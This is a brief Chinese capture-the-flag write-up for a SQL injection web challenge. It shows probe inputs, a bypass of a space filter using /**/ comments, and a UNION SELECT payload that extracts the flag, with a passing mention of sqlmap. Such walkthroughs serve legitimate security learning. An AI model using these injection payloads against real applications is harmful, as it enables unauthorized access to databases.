实验吧—Web——WP之 简单的sql注入之2

实验吧—Web——WP之 简单的sql注入之2

直接打开解题连接:

实验吧—Web——WP之 简单的sql注入之2

既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了

输入语句

1'and 1=1 #

1'and/**/1=1/**/#后

对比一下,发现是过滤掉了空格,我们用/**/代替空格

实验吧—Web——WP之 简单的sql注入之2

实验吧—Web——WP之 简单的sql注入之2

下面就要构造找flag的语句了

1'/**/union/**/select/**/flag/**/from/**/flag#

最后就能找到flag了,(其实这里面还有一些步骤,用SQLMap跑啊跑~)

实验吧—Web——WP之 简单的sql注入之2

上一篇:解析js中作用域、闭包——从一道经典的面试题开始


下一篇:【转】免装版tomcat注册成windows系统服务方法